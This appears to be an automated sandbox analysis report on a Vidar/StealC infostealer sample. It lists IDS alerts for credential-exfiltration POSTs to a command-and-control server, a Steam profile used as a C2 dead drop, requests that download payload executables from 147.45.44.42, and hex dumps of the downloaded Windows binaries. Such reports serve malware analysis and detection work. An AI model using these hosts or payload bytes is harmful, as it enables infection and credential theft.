                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49834 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49836 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.16:49836 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49887 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49931 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49951 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49965 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49976 -> 116.202.5.153:443
                Source: Network trafficSuricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.16:49960 -> 116.202.5.153:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199820567237
                Creates HTML files with .exe extension (expired dropper behavior)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile created: lfcjeuk6pz.exe.15.dr
                Yara detected Generic Downloader
                Source: Yara matchFile source: 5.2.SoftWareGX.exe.3cd94d0.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Jan 2025 17:10:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:34:25 GMTETag: "8a00-62ced529ccee7"Accept-Ranges: bytesContent-Length: 35328Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 cd a2 39 f4 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 80 00 00 00 08 00 00 00 00 00 00 1e 9f 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 9e 00 00 4f 00 00 00 00 a0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 0c 00 00 00 b0 9e 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 7f 00 00 00 20 00 00 00 80 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 a0 00 00 00 06 00 00 00 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 00 00 00 02 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f 00 00 00 00 00 00 48 00 00 00 02 00 05 00 a4 21 00 00 0c 7d 00 00 03 00 02 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 5c 00 00 00 01 00 00 11 02 28 0f 00 00 0a 0a 28 10 00 00 0a 03 6f 11 00 00 0a 0b 06 8e 69 8d 16 00 00 01 0c 16 0d 2b 2a 08 09 06 09 91 09 1f 3b 5a 20 00 01 00 00 5d d2 61 d2 9c 08 09 8f 16 00 00 01 25 47 07 09 07 8e 69 5d 91 61 d2 52 09 17 58 0d 09 06 8e 69 32 d0 28 10 00 00 0a 08 6f 12 00 00 0a 2a 1e 02 28 13 00 00 0a 2a 13 30 07 00 9e 00 00 00 02 00 00 11 72 01 00 00 70 0a 73 14 00 00 0a 73 15 00 00 0a 0b 07 6f 16 00 00 0a 72 26 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 6f 16 00 00 0a 72 48 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 17 00 00 0a 26 07 17 6f 18 00 00 0a 07 17 8d 19 00 00 01 25 16 06 7e 01 00 00 04 28 01 00 00 06 a2 6f 19 00 00 0a 6f 1a 00 00 0a 72 72 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1b 00 00 0a 72 8c 73 00 70 7e 01 00 00 04 28 01 00 00 06 6f 1c 00 00 0a 14 14 6f 1d 00 00 0a 26 2a 1e 02 28 13 00 00 0a 2a 1a 28 03 00 00 06 2a 1e 02 28 13 00 00 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 30 Jan 2025 17:10:51 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 30 Jan 2025 14:32:13 GMTETag: "44200-62ced4abdebc0"Accept-Ranges: bytesContent-Length: 279040Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 80 bc 97 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 d4 02 00 00 6a 01 00 00 00 00 00 f0 41 02 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 04 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 8a 03 00 57 00 00 00 57 8a 03 00 54 01 00 00 00 30 04 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 04 00 d0 61 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 86 03 00 5c 00 00 00 00 00 00 00 00 00 00 00 d4 8e 03 00 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 7c d2 02 00 00 10 00 00 00 d4 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 b4 af 00 00 00 f0 02 00 00 b0 00 00 00 d8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 73 00 00 00 a0 03 00 00 54 00 00 00 88 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 20 04 00 00 02 00 00 00 dc 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 a8 01 00 00 00 30 04 00 00 02 00 00 00 de 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d0 61 00 00 00 40 04 00 00 62 00 00 00 e0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /boom/tvhaqk.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42Connection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /boom/uykb.exe HTTP/1.1fDsdWpC1Kr1ADlJEQf5TUrSTrY2h2u41sMkrsfhwLwlxIQCB6y: VtAoUiLGBN8JuIRrrC1tFjmxppXCaGpKltJpaX9l7d4gYg3aW4Host: 147.45.44.42
                Source: Joe Sandbox ViewIP Address: 68.67.160.26 68.67.160.26
                Source: Joe Sandbox ViewIP Address: 108.139.47.50 108.139.47.50
                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.16:49989 -> 162.125.66.18:443
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.77.188
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 15_2_00407A70 InternetReadFile,15_2_00407A70
                Source: global trafficHTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: huloar.liveConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEI3L3NAQiRys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/1.1Host: apis.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlaHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.d0b81df0decfa0886dfe.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/web-worker.8ed343c804e9069b52b4.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.35sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /crx/blobs/ASuc5ohfQPNzGo5SSihcSk6msC8CUKw5id-p0KCEkBKwK2LS4AjdrDP0wa1qjzCTaTWEfyM52ADmUAdPETYA5vgD87UPEj6gyG11hjsvMLHGmzQgJ9F5D8s8Lo0Lbai5BQYAxlKa5esPJXukyaicyq83JwZ0HIWqzrjN/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_86_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.a8bc96a9c4710d87d862.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.eee185b1083ffdf6d054.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.026b9a80c7ff937f7d4f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b?rn=1738257081027&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=145825B7BD7A64E20DCF3033BCF06578&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
